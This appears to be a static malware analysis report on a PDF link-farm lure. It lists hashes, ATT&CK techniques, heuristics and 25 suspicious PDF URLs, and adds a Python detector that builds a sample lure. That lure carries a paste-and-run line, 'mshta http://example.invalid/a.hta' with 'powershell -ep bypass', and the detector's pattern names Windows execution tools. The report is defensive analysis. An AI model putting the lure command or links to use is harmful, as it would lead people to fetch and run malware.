Malicious PDF — malware analysis report

Static analysis result for SHA-256 cbad100f4ec3b3e3…

Verdict: MALICIOUS
File type: PDF
Size: 145.1 KB
Created: 2020-03-07 16:45:37 +02:00
Authoring application: wkhtmltopdf 0.12.1.4 (via Qt 4.8.6)
MD5: e1ad29693bf5159f19f1bb460b0a3282
SHA-1: a775d4896f9a1a8b5370986824f9e54f4d08c8ae
SHA-256: cbad100f4ec3b3e32e287be086c0d41e55968e92c08aa49d167d352ccf890d2c
Risk score: 104

Malware Insights

MITRE ATT&CK
  • T1566.002 Spearphishing Attachment
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample is a small, machine-generated PDF (wkhtmltopdf output) whose content is mostly links rather than text: 25 clickable links to other PDFs, each on a different domain but all under the identical /uploads/1/3/0/<digit>/<nine-digit id>/ path template, plus the primary URL http://74-123-78-154.mgwnet.com/uploads/1/3/0/7/130776517/130776517.html#signs+and+symptoms+of+asthma+exacerbation, whose fragment poses as an article on asthma symptoms. Dynamically generated links to unrelated content with one shared path template are the signature of an SEO link-farm carrier, not a genuine document; note that in this sample the clustering is on the path template rather than on a single host, even though the heuristic description below speaks of one host. The SE_LOLBIN_RUN_COMMAND heuristic also fired, meaning the rendered text contains a visible command line involving a Windows execution tool such as PowerShell. None of the heuristics indicates an automatic launch action or embedded JavaScript, so the expected chain is social engineering: the reader is told to copy and run the command (T1204.002), which would then download and execute a further payload. The report does not reproduce the command text, so the second-stage URL cannot be established from this sample alone.

Heuristics (4)

  • PDF_SEO_LINK_FARM (critical): Small PDF contains mass external PDF link farm
    Small PDF contains many clickable external PDF links, mostly clustered on one host. This matches generated SEO/link-farm PDF carriers used to route users into malicious or unwanted-software delivery chains, rather than a normal document citation pattern.
  • SE_LOLBIN_RUN_COMMAND (high): Visible LOLBin command execution instruction
    Document contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32.
  • PDF_URI (info): External URI
    PDF contains an external URL action.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL channel labels (macro, JS, link annotation, document body, ...) record which path reached each URL and are not shown in this excerpt.
    Primary URL:
    • http://74-123-78-154.mgwnet.com/uploads/1/3/0/7/130776517/130776517.html#signs+and+symptoms+of+asthma+exacerbation
    Clickable external PDF links (25), all under the same /uploads/1/3/0/<digit>/<nine-digit id>/ path template:
    • http://www.cherylthibodeau.com/uploads/1/3/0/6/130604696/gatelovog_mamabitesixovo_kolul_womugixesutati.pdf
    • http://studiob.agency/uploads/1/3/0/4/130476447/5177399.pdf
    • http://roryward.com/uploads/1/3/0/2/130291485/resagajomuwabuk.pdf
    • http://slowgrinder.com/uploads/1/3/0/7/130739000/dedanitalovozuzodada.pdf
    • http://merryleetraum.net/uploads/1/3/0/4/130477566/e903d7cb7a.pdf
    • http://beginningbosslife.com/uploads/1/3/0/3/130323552/sosase.pdf
    • http://cupcakesandaliens.com/uploads/1/3/0/5/130588803/4930157.pdf
    • http://sorteincorporation.co.za/uploads/1/3/0/7/130776891/lojomivagozeveg-fated-palaba-lujugaxu.pdf
    • http://5-8dublinmiddle.com/uploads/1/3/0/5/130550967/bisawenafadaku.pdf
    • http://hendersonchristianoutreach.com/uploads/1/3/0/2/130291415/nusizonadewezob.pdf
    • http://www.murrayforward5.com/uploads/1/3/0/8/130813054/f08cd3ff9615.pdf
    • http://mta-sts.mail.escapeartistswartown.com/uploads/1/3/0/3/130323761/421238.pdf
    • http://mta-sts.thaisrussomano.com/uploads/1/3/0/8/130814935/vobibunadog.pdf
    • http://klawittertransitllc.com/uploads/1/3/0/6/130621209/tobanaro.pdf
    • http://romboid.pl/uploads/1/3/0/7/130739063/8195655.pdf
    • http://experiencegrace.net/uploads/1/3/0/4/130490833/nuwukipepa.pdf
    • http://www.dtboost.com/uploads/1/3/0/7/130738814/9165591.pdf
    • http://derrickgardnerphotography.com/uploads/1/3/0/3/130379244/685735.pdf
    • http://www.basicbitcheshealtheearth.com/uploads/1/3/0/7/130740558/panuruxa_fifuropap.pdf
    • http://betterbartlett.org/uploads/1/3/0/6/130604878/beboduralop.pdf
    • http://imgmfr.com/uploads/1/3/0/5/130545260/balopig-wunaretot.pdf
    • http://www.greaterenochgrove.com/uploads/1/3/0/4/130488884/bd09bbe01323.pdf
    • http://coloniakiters.com/uploads/1/3/0/2/130289427/mezujakakope.pdf
    • http://fairdebonaire.com/uploads/1/3/0/6/130621176/4514398.pdf
    • http://blufftonchurch.org/uploads/1/3/0/5/130539215/f5a2d7.pdf
    XMP metadata namespace identifiers (standard RDF, Dublin Core and Adobe XMP schema URIs from the document's metadata stream; these are not link targets):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/rights/
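The two leading heuristics in this report, PDF_SEO_LINK_FARM and SE_LOLBIN_RUN_COMMAND, can be reproduced with a small amount of parsing. The block below is an added example written for this page, not the scanner's own code: it pulls /URI action targets out of a PDF, scores the link-farm pattern (a small file with many external .pdf links whose directory paths collapse to one template, as in the list above), and scans inflated stream bodies for Windows execution tools. The lure PDF it runs on is constructed inline; the .example and .invalid host names, the instruction text and the thresholds are assumptions.

```python
"""Added example (not the scanner's own code): re-implements the two leading
heuristics from this report, PDF_SEO_LINK_FARM and SE_LOLBIN_RUN_COMMAND, over
a lure PDF that is constructed inline. Thresholds and host names are assumptions."""
import re
import zlib
from collections import Counter
from urllib.parse import urlsplit

# /URI (literal-string) action targets; hex-string URIs and encrypted PDFs are
# out of scope for this example.
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.S)
# Windows execution tools named by the SE_LOLBIN_RUN_COMMAND heuristic, plus a
# few common siblings; matched as whole words, case-insensitively.
LOLBIN_RE = re.compile(
    rb"\b(powershell(?:\.exe)?|pwsh|mshta|cmd(?:\.exe)?|rundll32|regsvr32|"
    rb"wscript|cscript|certutil|bitsadmin)\b", re.I)


def extract_uris(pdf: bytes) -> list:
    """Return every /URI action target found in the raw file, unescaping \( and \)."""
    return [m.group(1).replace(rb"\(", b"(").replace(rb"\)", b")").decode("latin-1")
            for m in URI_RE.finditer(pdf)]


def link_farm_verdict(uris, pdf_size, max_size=512 * 1024, min_links=10, min_share=0.8):
    """PDF_SEO_LINK_FARM-style check: a small file with many external links to
    other PDFs whose directory paths collapse to one template (digit runs -> N)."""
    pdf_links = [u for u in uris
                 if urlsplit(u).scheme in ("http", "https")
                 and urlsplit(u).path.lower().endswith(".pdf")]
    hosts = Counter(urlsplit(u).hostname for u in pdf_links)
    templates = Counter(re.sub(r"\d+", "N", urlsplit(u).path.rsplit("/", 1)[0])
                        for u in pdf_links)
    template, count = templates.most_common(1)[0] if templates else ("", 0)
    share = count / len(pdf_links) if pdf_links else 0.0
    return {
        "pdf_links": len(pdf_links),
        "distinct_hosts": len(hosts),
        "dominant_template": template,
        "template_share": share,
        "fires": pdf_size <= max_size and len(pdf_links) >= min_links and share >= min_share,
    }


def lolbin_hits(pdf: bytes) -> list:
    """SE_LOLBIN_RUN_COMMAND-style check over every stream body, inflating
    FlateDecode streams. Caveat: this only sees literal text; wkhtmltopdf draws
    text through subset fonts with custom encodings, so a production scanner
    runs a real text extractor (e.g. pdftotext) before matching."""
    hits = set()
    for m in STREAM_RE.finditer(pdf):
        data = m.group(1)
        try:
            data = zlib.decompressobj().decompress(data)
        except zlib.error:
            pass  # not Flate-compressed: scan the raw bytes
        hits.update(h.decode().lower() for h in LOLBIN_RE.findall(data))
    return sorted(hits)


def build_sample_pdf(urls, visible_text, compress=False) -> bytes:
    """Constructed one-page lure: one link annotation per URL and a content
    stream carrying the visible instruction text (no xref table; the regex
    scanners above do not need one)."""
    content = b"BT /F1 12 Tf 72 720 Td (" + visible_text.encode() + b") Tj ET"
    filt = b""
    if compress:
        content, filt = zlib.compress(content), b" /Filter /FlateDecode"
    annots = b" ".join(b"%d 0 R" % (5 + i) for i in range(len(urls)))
    objs = [b"<< /Type /Catalog /Pages 2 0 R >>",
            b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R /Contents 4 0 R /Annots [" + annots + b"] >>",
            b"<< /Length %d%s >>\nstream\n" % (len(content), filt) + content + b"\nendstream"]
    objs += [b"<< /Type /Annot /Subtype /Link /Rect [0 0 10 10] /A << /S /URI /URI ("
             + u.encode() + b") >> >>" for u in urls]
    out = b"%PDF-1.4\n"
    for num, obj in enumerate(objs, 1):
        out += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed sample mirroring the report: one lure page plus twelve .pdf links
# on twelve different (fictional) hosts that share one /uploads/... path template.
SAMPLE_URLS = ["http://lure.example/uploads/1/3/0/7/130776517/130776517.html#signs"] + [
    f"http://site{i:02d}.example/uploads/1/3/0/{i % 9}/1303{i:05d}/doc{i}.pdf"
    for i in range(12)]
SAMPLE_TEXT = ("Press Win+R, paste: mshta http://example.invalid/a.hta "
               "or run powershell -ep bypass")

if __name__ == "__main__":
    pdf = build_sample_pdf(SAMPLE_URLS, SAMPLE_TEXT, compress=True)
    print(link_farm_verdict(extract_uris(pdf), len(pdf)))
    print(lolbin_hits(pdf))
```

The path-template collapse is the part worth keeping from this sample: counting hosts alone would miss it, because the 25 links above sit on 25 different domains. The text check is deliberately the weak half; on real wkhtmltopdf output it should be fed extracted text, not raw content streams.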

Extracted artifacts (3)

Files carved from inside the sample during analysis. All three are embedded sfnt (TrueType/OpenType container) font subsets, which is what a wkhtmltopdf rendering of an HTML page normally contains; no heuristic in this report is attached to them.

  • font_00_sfnt_off0001eb18.bin
    Kind: pdf-font-stream
    Source: PDF embedded font (sfnt) at offset 0x1EB18
    Size: 10968 bytes
    SHA-256: 6847ba6c011e8c77e43bf84a3e160ff344337320eed7abb66866723bf5d39f58
  • font_01_sfnt_off0002116f.bin
    Kind: pdf-font-stream
    Source: PDF embedded font (sfnt) at offset 0x2116F
    Size: 3620 bytes
    SHA-256: af5d1abf438d1ed0dbbe213e31909cce2043c4a5bbaf1d24522a800f03f33df6
  • font_02_sfnt_off00021e12.bin
    Kind: pdf-font-stream
    Source: PDF embedded font (sfnt) at offset 0x21E12
    Size: 16320 bytes
    SHA-256: 3714710c508d524414e0dd842408b5ef2283e7cac44fc843bc37d9c0b7b80784